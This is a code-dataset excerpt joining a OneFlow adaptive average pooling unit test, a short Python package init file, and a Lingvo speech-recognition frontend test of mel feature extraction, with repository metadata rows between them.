                    [0.75090294441452277, -0.92992883985623231, -0.73430540527824761, -0.88064815906966942],
                    [-0.47078530163539850, 0.12253641652645629, 0.50880220398328457, 0.52039178932756203],
                    [-0.08613006511636320, 0.30291348404866386, -0.62685658736801231, -0.27469204305759976],
                ],
            ]]]
        ),
        dtype=flow.float32,
        device=flow.device(device),
    )
    m = flow.nn.AdaptiveAvgPool3d((1, 2, 3))
    m.to(device)
    of_out = m(input)
    # Reference is 4-D (1, 1, 2, 3); np.allclose broadcasts it against the
    # 5-D (1, 1, 1, 2, 3) module output.
    np_out = np.array(
        [[[
            [0.08871791260375947, -0.40249593765093078, 0.00722249259371315],
            [-0.31343444964845824, 0.08188803218941582, -0.09210164562800888],
        ]]]
    )
    test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 1e-5, 1e-5))
def _test_adaptive_avgpool3d_dhw_backward(test_case, device):
    # Backward pass of flow.nn.AdaptiveAvgPool3d((1, 2, 3)) on a 1x1x4x4x4
    # input. Along the width axis the middle two columns are shared between
    # overlapping windows, so they receive 0.125 while the edges get 0.0625.
    input = flow.Tensor(
        np.array(
            [[[
                [
                    [-1.07757179960088489, -0.78045388903658375, -1.26275387521194427, 0.99935071451204771],
                    [2.02225324891575164, 1.10345137769946500, -0.43773247548795780, 1.89049181058751703],
                    [-0.55938618990646538, -0.49495202415265188, -0.18536721363519787, -0.60989698667757719],
                    [-1.65362152601718160, -1.03925835404367861, 0.36867765976139671, -0.53568828349518050],
                ],
                [
                    [-1.26179006644499525, -1.43909210916315322, 0.20654399652431357, 0.81864721019067133],
                    [-0.30333788634000142, -0.81732697640762930, -0.37675150976256139, -0.11021655039337777],
                    [-0.22977043608192885, 1.27171963666499055, -0.47908512978782908, -1.44953694047278558],
                    [-1.28020932869777826, -0.11184514806663474, 1.70221670872109843, -1.73548372877253554],
                ],
                [
                    [2.47064979917736061, -0.65497026319732976, -0.93181070795716758, 1.46529042716824276],
                    [1.14198642343413970, 1.38990908108600797, 0.96578419005255678, -0.85631142649766190],
                    [0.19515087084250754, -0.37808457398571094, 0.29386253984961830, 0.92799305103533269],
                    [-0.93741182779940069, 0.33418317304524309, -0.27925427653038332, 0.38029090707066726],
                ],
                [
                    [0.59186866597360410, -0.78706310899389020, -0.95343448742453918, 0.31341612954718795],
                    [0.75090294441452277, -0.92992883985623231, -0.73430540527824761, -0.88064815906966942],
                    [-0.47078530163539850, 0.12253641652645629, 0.50880220398328457, 0.52039178932756203],
                    [-0.08613006511636320, 0.30291348404866386, -0.62685658736801231, -0.27469204305759976],
                ],
            ]]]
        ),
        dtype=flow.float32,
        device=flow.device(device),
        requires_grad=True,
    )
    m = flow.nn.AdaptiveAvgPool3d((1, 2, 3))
    of_out = m(input)
    of_out = of_out.sum()
    of_out.backward()
    np_grad = np.array(
        [[[
            [
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
            ],
            [
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
            ],
            [
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
            ],
            [
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
                [0.0625, 0.125, 0.125, 0.0625],
            ],
        ]]]
    )
    test_case.assertTrue(np.allclose(input.grad.numpy(), np_grad, 1e-5, 1e-5))
@flow.unittest.skip_unless_1n1d()
class TestAdaptiveAvgPool(flow.unittest.TestCase):
    """Runs every adaptive-average-pool helper on both cpu and cuda."""

    def test_adaptive_avgpool1d(test_case):
        cases = OrderedDict()
        cases["test_fun"] = [
            _test_adaptive_avgpool1d_forward,
            _test_adaptive_avgpool1d_backward,
        ]
        cases["device"] = ["cpu", "cuda"]
        for test_fun, device in GenArgList(cases):
            test_fun(test_case, device)

    def test_adaptive_avgpool2d(test_case):
        cases = OrderedDict()
        cases["test_fun"] = [
            _test_adaptive_avgpool2d_forward,
            _test_adaptive_avgpool2d_backward,
            _test_adaptive_avgpool2d_hw_forward,
            _test_adaptive_avgpool2d_hw_backward,
        ]
        cases["device"] = ["cpu", "cuda"]
        for test_fun, device in GenArgList(cases):
            test_fun(test_case, device)

    def test_adaptive_avgpool3d(test_case):
        cases = OrderedDict()
        cases["test_fun"] = [
            _test_adaptive_avgpool3d_forward,
            _test_adaptive_avgpool3d_backward,
            _test_adaptive_avgpool3d_dhw_forward,
            _test_adaptive_avgpool3d_dhw_backward,
        ]
        cases["device"] = ["cpu", "cuda"]
        for test_fun, device in GenArgList(cases):
            test_fun(test_case, device)
# Allow running this test module directly via the unittest CLI.
if __name__ == "__main__":
    unittest.main()
| 36.953897
| 88
| 0.332541
| 1,933
| 33,665
| 5.670978
| 0.133471
| 0.03503
| 0.043332
| 0.057654
| 0.881682
| 0.859788
| 0.85322
| 0.849754
| 0.849754
| 0.84802
| 0
| 0.517
| 0.59201
| 33,665
| 910
| 89
| 36.994505
| 0.281107
| 0.017763
| 0
| 0.671694
| 0
| 0
| 0.003176
| 0
| 0
| 0
| 0
| 0.001099
| 0.015081
| 1
| 0.015081
| false
| 0
| 0.0058
| 0
| 0.022042
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6b1f5a1501e6b73fa452fad3f10b97e8bd819a92
| 109
|
py
|
Python
|
hermes-message/models/__init__.py
|
popsolutions/hermes-message
|
cbe51b443656908255e142e2dd2a524d63222279
|
[
"MIT"
] | null | null | null |
hermes-message/models/__init__.py
|
popsolutions/hermes-message
|
cbe51b443656908255e142e2dd2a524d63222279
|
[
"MIT"
] | 5
|
2021-08-05T14:05:43.000Z
|
2021-11-05T22:07:56.000Z
|
hermes-message/models/__init__.py
|
popsolutions/hermes-message
|
cbe51b443656908255e142e2dd2a524d63222279
|
[
"MIT"
] | 1
|
2022-02-15T04:11:14.000Z
|
2022-02-15T04:11:14.000Z
|
from . import mail_message
from . import hermes_monitor
from . import hermes_apps
from . import hermes_token
| 21.8
| 28
| 0.816514
| 16
| 109
| 5.3125
| 0.5
| 0.470588
| 0.564706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146789
| 109
| 4
| 29
| 27.25
| 0.913978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8621c0ab64ba809a77aded2f306fc6c98e76c765
| 20,159
|
py
|
Python
|
lingvo/tasks/asr/frontend_test.py
|
allenwang28/lingvo
|
26d3d6672d3f46d8f281c2aa9f57166ef6296738
|
[
"Apache-2.0"
] | 2,611
|
2018-10-16T20:14:10.000Z
|
2022-03-31T14:48:41.000Z
|
lingvo/tasks/asr/frontend_test.py
|
allenwang28/lingvo
|
26d3d6672d3f46d8f281c2aa9f57166ef6296738
|
[
"Apache-2.0"
] | 249
|
2018-10-27T06:02:29.000Z
|
2022-03-30T18:00:39.000Z
|
lingvo/tasks/asr/frontend_test.py
|
allenwang28/lingvo
|
26d3d6672d3f46d8f281c2aa9f57166ef6296738
|
[
"Apache-2.0"
] | 436
|
2018-10-25T05:31:45.000Z
|
2022-03-31T07:26:03.000Z
|
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for asr frontend."""
import lingvo.compat as tf
from lingvo.core import py_utils
from lingvo.core import test_helper
from lingvo.core import test_utils
from lingvo.tasks.asr import frontend
import numpy as np
class AsrFrontendTest(test_utils.TestCase):
def _GetPcm(self):
  """Gets sample wav file pcm samples.

  Returns:
    (sample_rate, mono_audio) where mono_audio is of shape
    [batch (=1), samples].
  """
  wav_path = test_helper.test_src_dir_path('tools/testdata/gan_or_vae.wav')
  with open(wav_path, 'rb') as wav_file:
    wavdata = wav_file.read()
  decoded = tf.audio.decode_wav(wavdata)
  # The test file is mono: drop the trailing channel dimension.
  mono = tf.squeeze(py_utils.HasShape(decoded.audio, [75900, 1]), axis=1)
  # Return batch-major audio with a single batch element.
  return decoded.sample_rate, tf.expand_dims(mono, axis=0)
def _CreateFrontendParams(self):
  """Returns MelAsrFrontend params with a tiny, noise-free configuration."""
  params = frontend.MelAsrFrontend.Params()
  params.sample_rate = 24000.
  params.num_bins = 2
  params.noise_scale = 0.
  return params
def testNullAsrFrontendConfig(self):
  """NullAsrFrontend reports a null pass-through configuration."""
  params = frontend.NullAsrFrontend.Params()
  params.name = 'null'
  config = params.Instantiate().config
  self.assertTrue(config.is_null)
  self.assertEqual('none', config.src_type)
  self.assertEqual(-1, config.output_dim)
  self.assertEqual(1.0, config.input_frame_ratio)
def testMelFeaturesUnstackedConfig(self):
  """Unstacked frontend reports pcm input and one frame per 480 samples."""
  config = self._CreateFrontendParams().Instantiate().config
  self.assertFalse(config.is_null)
  self.assertEqual('pcm', config.src_type)
  self.assertEqual(32768.0, config.src_pcm_scale)
  self.assertEqual(16000.0, config.src_pcm_sample_rate)
  self.assertEqual(2, config.output_dim)
  # Approx 34 output frames per second.
  self.assertEqual(480.0, config.input_frame_ratio)
def testMelFeaturesLeftStackedConfig(self):
  """Stacking 2 left-context frames triples output_dim and frame ratio."""
  p = self._CreateFrontendParams()
  p.stack_left_context = 2
  p.frame_stride = p.stack_left_context + 1
  config = p.Instantiate().config
  self.assertFalse(config.is_null)
  self.assertEqual('pcm', config.src_type)
  self.assertEqual(32768.0, config.src_pcm_scale)
  self.assertEqual(16000.0, config.src_pcm_sample_rate)
  self.assertEqual(6, config.output_dim)
  # Approx 12 output frames per second.
  self.assertEqual(1440.0, config.input_frame_ratio)
def testMelFeaturesLeftRightStackedConfig(self):
  """Stacking 2 frames of context on each side yields a 2400x frame ratio."""
  p = self._CreateFrontendParams()
  p.stack_right_context = 2
  p.stack_left_context = 2
  p.frame_stride = p.stack_right_context + p.stack_left_context + 1
  config = p.Instantiate().config
  # Approx 6 output frames per second.
  self.assertEqual(2400.0, config.input_frame_ratio)
def testMelFeaturesUnstacked(self):
  """Unstacked mel features match reference per-bin mean/stddev."""
  p = self._CreateFrontendParams()
  mel_frontend = p.Instantiate()
  sample_rate, pcm = self._GetPcm()
  pcm *= 32768
  # Convert to 4D [batch, time, packet, channels] using an 11-sample
  # (deliberately non-round) packet size; the remainder is trimmed.
  packet_size = 11
  sample_count = tf.shape(pcm)[1]
  trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
  src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
  paddings = tf.zeros(tf.shape(src_inputs)[0:2])
  outputs = mel_frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
  log_mel = outputs.src_inputs
  paddings = outputs.paddings
  with self.session():
    pcm = self.evaluate(pcm)
    tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
    self.assertGreater(33000, np.amax(pcm))
    self.assertGreater(np.amax(pcm), 2.)
    log_mel, paddings, sample_rate = self.evaluate(
        [log_mel, paddings, sample_rate])
    self.assertEqual(sample_rate, p.sample_rate)
    self.assertEqual(paddings.shape, log_mel.shape[0:2])
    self.assertAllEqual(paddings, np.zeros_like(paddings))
    # log_mel ~ [batch, time, feature_size, channel]
    tf.logging.info('mel ~ %s', log_mel.shape)
    self.assertEqual(log_mel.shape[2], 2)  # 2 bins
    # Squeeze the batch and channel dimensions out, then check per-bin
    # sample statistics against reference values.
    features = np.squeeze(log_mel, axis=(0, 3))
    mu = np.mean(features, axis=0)
    s = np.std(features, axis=0, ddof=1)
    tf.logging.info('Found mean = %s', mu)
    tf.logging.info('Found stddev = %s', s)
    self.assertAllClose(mu, [13.46184731, 13.30099297], atol=1e-4)
    self.assertAllClose(s, [1.3840059, 1.24434352], atol=1e-3)
def testMelFeaturesNotEmphasized(self):
  """Disabling pre-emphasis changes values but not the output shape."""
  p = self._CreateFrontendParams()
  mel_frontend = p.Instantiate()
  no_preemph_p = p.Copy()
  no_preemph_p.preemph = 0.
  no_preemph_frontend = no_preemph_p.Instantiate()
  _, pcm = self._GetPcm()
  pcm *= 32768
  # Convert to 4D [batch, time, packet, channels] using an 11-sample
  # (deliberately non-round) packet size; the remainder is trimmed.
  packet_size = 11
  sample_count = tf.shape(pcm)[1]
  trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
  src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
  paddings = tf.zeros(tf.shape(src_inputs)[0:2])
  log_mel = mel_frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings)).src_inputs
  no_preemph_log_mel = no_preemph_frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings)).src_inputs
  with self.session():
    log_mel, no_preemph_log_mel = self.evaluate(
        [log_mel, no_preemph_log_mel])
    self.assertEqual(log_mel.shape, no_preemph_log_mel.shape)
def testMelFeaturesLeftStacked(self):
  """Left-stacked (context=2, stride=3) mel features match references."""
  p = self._CreateFrontendParams()
  p.stack_left_context = 2
  p.frame_stride = p.stack_left_context + 1
  mel_frontend = p.Instantiate()
  sample_rate, pcm = self._GetPcm()
  pcm *= 32768
  # Convert to 4D [batch, time, packet, channels] using an 11-sample
  # (deliberately non-round) packet size; the remainder is trimmed.
  packet_size = 11
  sample_count = tf.shape(pcm)[1]
  trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
  src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
  paddings = tf.zeros(tf.shape(src_inputs)[0:2])
  outputs = mel_frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
  log_mel = outputs.src_inputs
  paddings = outputs.paddings
  with self.session():
    pcm = self.evaluate(pcm)
    tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
    self.assertGreater(33000, np.amax(pcm))
    self.assertGreater(np.amax(pcm), 2.)
    log_mel, paddings, sample_rate = self.evaluate(
        [log_mel, paddings, sample_rate])
    self.assertEqual(sample_rate, p.sample_rate)
    self.assertEqual(paddings.shape, log_mel.shape[0:2])
    self.assertAllEqual(paddings, np.zeros_like(paddings))
    # log_mel ~ [batch, time, feature_size, channel]
    tf.logging.info('mel ~ %s', log_mel.shape)
    # Squeeze the batch and channel dimensions out, then check per-bin
    # sample statistics against reference values.
    features = np.squeeze(log_mel, axis=(0, 3))
    mu = np.mean(features, axis=0)
    s = np.std(features, axis=0, ddof=1)
    tf.logging.info('Found mean = %s', mu)
    tf.logging.info('Found stddev = %s', s)
    self.assertAllClose(
        mu, (13.38236332, 13.2698698, 13.45229626, 13.26469517, 13.46731281,
             13.31649303), atol=1e-4)
    self.assertAllClose(
        s, (1.52104115, 1.27433181, 1.41266346, 1.27072334, 1.41251481,
            1.28583682), atol=1e-3)
def testMelFeaturesRightStacked(self):
  """Right-stacked (context=2, stride=3) mel features match references."""
  p = self._CreateFrontendParams()
  p.stack_right_context = 2
  p.frame_stride = p.stack_right_context + 1
  mel_frontend = p.Instantiate()
  sample_rate, pcm = self._GetPcm()
  pcm *= 32768
  # Convert to 4D [batch, time, packet, channels] using an 11-sample
  # (deliberately non-round) packet size; the remainder is trimmed.
  packet_size = 11
  sample_count = tf.shape(pcm)[1]
  trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
  src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
  paddings = tf.zeros(tf.shape(src_inputs)[0:2])
  outputs = mel_frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
  log_mel = outputs.src_inputs
  paddings = outputs.paddings
  with self.session():
    pcm = self.evaluate(pcm)
    tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
    self.assertGreater(33000, np.amax(pcm))
    self.assertGreater(np.amax(pcm), 2.)
    log_mel, paddings, sample_rate = self.evaluate(
        [log_mel, paddings, sample_rate])
    self.assertEqual(sample_rate, p.sample_rate)
    self.assertEqual(paddings.shape, log_mel.shape[0:2])
    self.assertAllEqual(paddings, np.zeros_like(paddings))
    # log_mel ~ [batch, time, feature_size, channel]
    tf.logging.info('mel ~ %s', log_mel.shape)
    # Squeeze the batch and channel dimensions out, then check per-bin
    # sample statistics against reference values.
    features = np.squeeze(log_mel, axis=(0, 3))
    mu = np.mean(features, axis=0)
    s = np.std(features, axis=0, ddof=1)
    tf.logging.info('Found mean = %s', mu)
    tf.logging.info('Found stddev = %s', s)
    self.assertAllClose(
        mu, (13.46731281, 13.31649303, 13.41263676, 13.28540039, 13.48256969,
             13.2802248), atol=1e-4)
    self.assertAllClose(
        s, (1.41251481, 1.28583682, 1.43964291, 1.23710775, 1.32300735,
            1.23345602), atol=1e-3)
def testMelFeaturesPaddedLeftStacked(self):
  """Checks padding propagation with two frames of left context stacked."""
  p = self._CreateFrontendParams()
  p.stack_left_context = 2
  p.frame_stride = p.stack_left_context + 1
  frontend = p.Instantiate()
  sample_rate, pcm = self._GetPcm()
  pcm *= 32768  # Scale [-1, 1) PCM up to the int16 sample range.
  # Reshape to 4D [batch, time, packet, channels] using an 11-sample packet
  # (deliberately not a round number).
  packet_size = 11
  sample_count = tf.shape(pcm)[1]
  usable_samples = (sample_count // packet_size) * packet_size
  src_inputs = tf.reshape(pcm[:, 0:usable_samples], (1, -1, packet_size, 1))
  # Mark everything after the first 455 packets as padding.
  unpadded_packets = 455
  paddings = tf.concat([
      tf.zeros([1, unpadded_packets], dtype=tf.float32),
      tf.ones([1, tf.shape(src_inputs)[1] - unpadded_packets],
              dtype=tf.float32)
  ],
                       axis=1)
  # frame_step=240, frame_size=601, +1202 left padded frames
  # 455 packets * 11 samples = 5005 samples, rounds down to 21 mel
  # frames. Divide by 3 for stacking = 7.
  expected_unpadded = 7
  outputs = frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
  log_mel = outputs.src_inputs
  paddings = outputs.paddings
  with self.session():
    pcm = self.evaluate(pcm)
    tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
    # Sanity-check the scaled PCM amplitude range.
    self.assertGreater(33000, np.amax(pcm))
    self.assertGreater(np.amax(pcm), 2.)
    log_mel, paddings, sample_rate = self.evaluate(
        [log_mel, paddings, sample_rate])
    self.assertEqual(sample_rate, p.sample_rate)
    self.assertEqual(paddings.shape, log_mel.shape[0:2])
    # The first `expected_unpadded` output frames are valid, the rest padded.
    self.assertAllEqual(paddings[:, 0:expected_unpadded],
                        np.zeros([1, expected_unpadded]))
    self.assertAllEqual(paddings[:, expected_unpadded:],
                        np.ones([1, paddings.shape[1] - expected_unpadded]))
    # log_mel ~ [batch, time, feature_size, channel].
    tf.logging.info('mel ~ %s', log_mel.shape)
    # Drop the singleton batch and channel dimensions.
    features = np.squeeze(log_mel, axis=(0, 3))
    num_frames = features.shape[0]
    # Per-bin sample mean and unbiased standard deviation over time.
    mean = np.sum(features, axis=0) / num_frames
    centered = features - mean
    stddev = np.sqrt(np.sum(centered * centered, axis=0) / (num_frames - 1))
    tf.logging.info('Found mean = %s', mean)
    tf.logging.info('Found stddev = %s', stddev)
    ref_mean = (13.38236332, 13.2698698, 13.45229626, 13.26469517,
                13.46731281, 13.31649303)
    ref_stddev = (1.52104115, 1.27433181, 1.41266346, 1.27072334, 1.41251481,
                  1.28583682)
    self.assertAllClose(mean, ref_mean, atol=1e-4)
    self.assertAllClose(stddev, ref_stddev, atol=1e-3)
def testMelFeaturesPaddedRightStacked(self):
  """Checks padding propagation with two frames of right context stacked."""
  p = self._CreateFrontendParams()
  p.stack_right_context = 2
  p.frame_stride = p.stack_right_context + 1
  frontend = p.Instantiate()
  sample_rate, pcm = self._GetPcm()
  pcm *= 32768  # Scale [-1, 1) PCM up to the int16 sample range.
  # Reshape to 4D [batch, time, packet, channels] using an 11-sample packet
  # (deliberately not a round number).
  packet_size = 11
  sample_count = tf.shape(pcm)[1]
  usable_samples = (sample_count // packet_size) * packet_size
  src_inputs = tf.reshape(pcm[:, 0:usable_samples], (1, -1, packet_size, 1))
  # Mark everything after the first 455 packets as padding.
  unpadded_packets = 455
  paddings = tf.concat([
      tf.zeros([1, unpadded_packets], dtype=tf.float32),
      tf.ones([1, tf.shape(src_inputs)[1] - unpadded_packets],
              dtype=tf.float32)
  ],
                       axis=1)
  # frame_step=240, frame_size=600, +1200 right padded frames
  # 455 packets * 11 samples = 5005 samples, rounds down to 21 mel
  # frames. Divide by 3 for stacking = 7.
  # TODO(talremez): Make sure this makes sense.
  expected_unpadded = 6
  outputs = frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
  log_mel = outputs.src_inputs
  paddings = outputs.paddings
  with self.session():
    pcm = self.evaluate(pcm)
    tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
    # Sanity-check the scaled PCM amplitude range.
    self.assertGreater(33000, np.amax(pcm))
    self.assertGreater(np.amax(pcm), 2.)
    log_mel, paddings, sample_rate = self.evaluate(
        [log_mel, paddings, sample_rate])
    self.assertEqual(sample_rate, p.sample_rate)
    self.assertEqual(paddings.shape, log_mel.shape[0:2])
    # The first `expected_unpadded` output frames are valid, the rest padded.
    self.assertAllEqual(paddings[:, 0:expected_unpadded],
                        np.zeros([1, expected_unpadded]))
    self.assertAllEqual(paddings[:, expected_unpadded:],
                        np.ones([1, paddings.shape[1] - expected_unpadded]))
def testMelMeanVarNormalization(self):
  """Verifies per-bin normalization yields ~zero mean and unit stddev."""
  p = self._CreateFrontendParams()
  p.stack_left_context = 2
  p.frame_stride = p.stack_left_context + 1
  # Reference statistics measured from the unnormalized frontend; feeding
  # them back as per-bin normalizers should whiten the output features.
  ref_mean = (13.38236332, 13.2698698, 13.45229626, 13.26469517, 13.46731281,
              13.31649303)
  ref_stddev = (1.52104115, 1.27433181, 1.41266346, 1.27072334, 1.41251481,
                1.28583682)
  p.per_bin_mean = ref_mean[:p.num_bins]
  p.per_bin_stddev = ref_stddev[:p.num_bins]
  frontend = p.Instantiate()
  _, pcm = self._GetPcm()
  pcm *= 32768  # Scale [-1, 1) PCM up to the int16 sample range.
  # Reshape to 4D [batch, time, packet, channels] using an 11-sample packet
  # (deliberately not a round number).
  packet_size = 11
  sample_count = tf.shape(pcm)[1]
  usable_samples = (sample_count // packet_size) * packet_size
  src_inputs = tf.reshape(pcm[:, 0:usable_samples], (1, -1, packet_size, 1))
  paddings = tf.zeros(tf.shape(src_inputs)[0:2])
  outputs = frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
  log_mel = outputs.src_inputs
  with self.session():
    log_mel = self.evaluate(log_mel)
    # log_mel ~ [batch, time, feature_size, channel].
    tf.logging.info('mel ~ %s', log_mel.shape)
    # Drop the singleton batch and channel dimensions.
    features = np.squeeze(log_mel, axis=(0, 3))
    num_frames = features.shape[0]
    # Per-bin sample mean and unbiased standard deviation over time.
    mean = np.sum(features, axis=0) / num_frames
    centered = features - mean
    stddev = np.sqrt(np.sum(centered * centered, axis=0) / (num_frames - 1))
    # Only compare the base (unstacked) bins.
    mean = mean[:p.num_bins]
    stddev = stddev[:p.num_bins]
    self.assertAllClose(mean, np.zeros_like(mean), atol=1e-4)
    self.assertAllClose(stddev, np.ones_like(stddev), atol=1e-3)
def testMelFeaturesUnstacked2D(self):
  """Checks the legacy 2D [batch, time] input path without stacking."""
  # TODO(laurenzo): Remove this test once 2D inputs support removed.
  p = self._CreateFrontendParams()
  frontend = p.Instantiate()
  sample_rate, pcm = self._GetPcm()
  pcm *= 32768  # Scale [-1, 1) PCM up to the int16 sample range.
  # Leave in 2D [batch, time].
  src_inputs = pcm
  paddings = tf.zeros(tf.shape(src_inputs)[0:2])
  outputs = frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
  log_mel = outputs.src_inputs
  paddings = outputs.paddings
  with self.session():
    pcm = self.evaluate(pcm)
    tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
    # Sanity-check the scaled PCM amplitude range.
    self.assertGreater(33000, np.amax(pcm))
    self.assertGreater(np.amax(pcm), 2.)
    log_mel, paddings, sample_rate = self.evaluate(
        [log_mel, paddings, sample_rate])
    self.assertEqual(sample_rate, p.sample_rate)
    self.assertEqual(paddings.shape, log_mel.shape[0:2])
    # With no input padding, the output should be fully unpadded too.
    self.assertAllEqual(paddings, np.zeros_like(paddings))
    # log_mel ~ [batch, time, feature_size, channel].
    tf.logging.info('mel ~ %s', log_mel.shape)
    self.assertEqual(log_mel.shape[2], 2)  # 2 bins
    # Drop the singleton batch and channel dimensions.
    features = np.squeeze(log_mel, axis=(0, 3))
    num_frames = features.shape[0]
    # Per-bin sample mean and unbiased standard deviation over time.
    mean = np.sum(features, axis=0) / num_frames
    centered = features - mean
    stddev = np.sqrt(np.sum(centered * centered, axis=0) / (num_frames - 1))
    tf.logging.info('Found mean = %s', mean)
    tf.logging.info('Found stddev = %s', stddev)
    ref_unstacked_mean = [13.46184731, 13.30099297]
    ref_unstacked_stddev = [1.3840059, 1.24434352]
    self.assertAllClose(mean, ref_unstacked_mean, atol=1e-4)
    self.assertAllClose(stddev, ref_unstacked_stddev, atol=1e-3)
def testMelFeaturesUnstacked3D(self):
  """Checks the legacy 3D [batch, time, 1] input path without stacking."""
  # TODO(laurenzo): Remove this test once 3D inputs support removed.
  p = self._CreateFrontendParams()
  frontend = p.Instantiate()
  sample_rate, pcm = self._GetPcm()
  pcm *= 32768  # Scale [-1, 1) PCM up to the int16 sample range.
  # Leave in 3D [batch, time, 1].
  src_inputs = tf.expand_dims(pcm, axis=2)
  paddings = tf.zeros(tf.shape(src_inputs)[0:2])
  outputs = frontend.FPropDefaultTheta(
      py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
  log_mel = outputs.src_inputs
  paddings = outputs.paddings
  with self.session():
    pcm = self.evaluate(pcm)
    tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
    # Sanity-check the scaled PCM amplitude range.
    self.assertGreater(33000, np.amax(pcm))
    self.assertGreater(np.amax(pcm), 2.)
    log_mel, paddings, sample_rate = self.evaluate(
        [log_mel, paddings, sample_rate])
    self.assertEqual(sample_rate, p.sample_rate)
    self.assertEqual(paddings.shape, log_mel.shape[0:2])
    # With no input padding, the output should be fully unpadded too.
    self.assertAllEqual(paddings, np.zeros_like(paddings))
    # log_mel ~ [batch, time, feature_size, channel].
    tf.logging.info('mel ~ %s', log_mel.shape)
    self.assertEqual(log_mel.shape[2], 2)  # 2 bins
    # Drop the singleton batch and channel dimensions.
    features = np.squeeze(log_mel, axis=(0, 3))
    num_frames = features.shape[0]
    # Per-bin sample mean and unbiased standard deviation over time.
    mean = np.sum(features, axis=0) / num_frames
    centered = features - mean
    stddev = np.sqrt(np.sum(centered * centered, axis=0) / (num_frames - 1))
    tf.logging.info('Found mean = %s', mean)
    tf.logging.info('Found stddev = %s', stddev)
    ref_unstacked_mean = [13.46184731, 13.30099297]
    ref_unstacked_stddev = [1.3840059, 1.24434352]
    self.assertAllClose(mean, ref_unstacked_mean, atol=1e-4)
    self.assertAllClose(stddev, ref_unstacked_stddev, atol=1e-3)
if __name__ == '__main__':
  # Standard entry point: run every test case in this file under the
  # TensorFlow test runner.
  tf.test.main()
| 40.47992
| 80
| 0.65782
| 2,810
| 20,159
| 4.54911
| 0.11032
| 0.042713
| 0.026441
| 0.021904
| 0.821169
| 0.813346
| 0.806462
| 0.794571
| 0.782524
| 0.781585
| 0
| 0.063194
| 0.214247
| 20,159
| 497
| 81
| 40.561368
| 0.743813
| 0.14336
| 0
| 0.811705
| 0
| 0
| 0.023229
| 0.001688
| 0
| 0
| 0
| 0.002012
| 0.183206
| 1
| 0.038168
| false
| 0
| 0.015267
| 0
| 0.061069
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86334799143a45c483afe6694da47d2113a27ee4
| 105
|
py
|
Python
|
examples/core/models/__init__.py
|
zyh1999/pytorch-quantum
|
c00bd564a99001fee2fd6b30e5e34562ab981e28
|
[
"MIT"
] | 98
|
2021-07-23T07:11:32.000Z
|
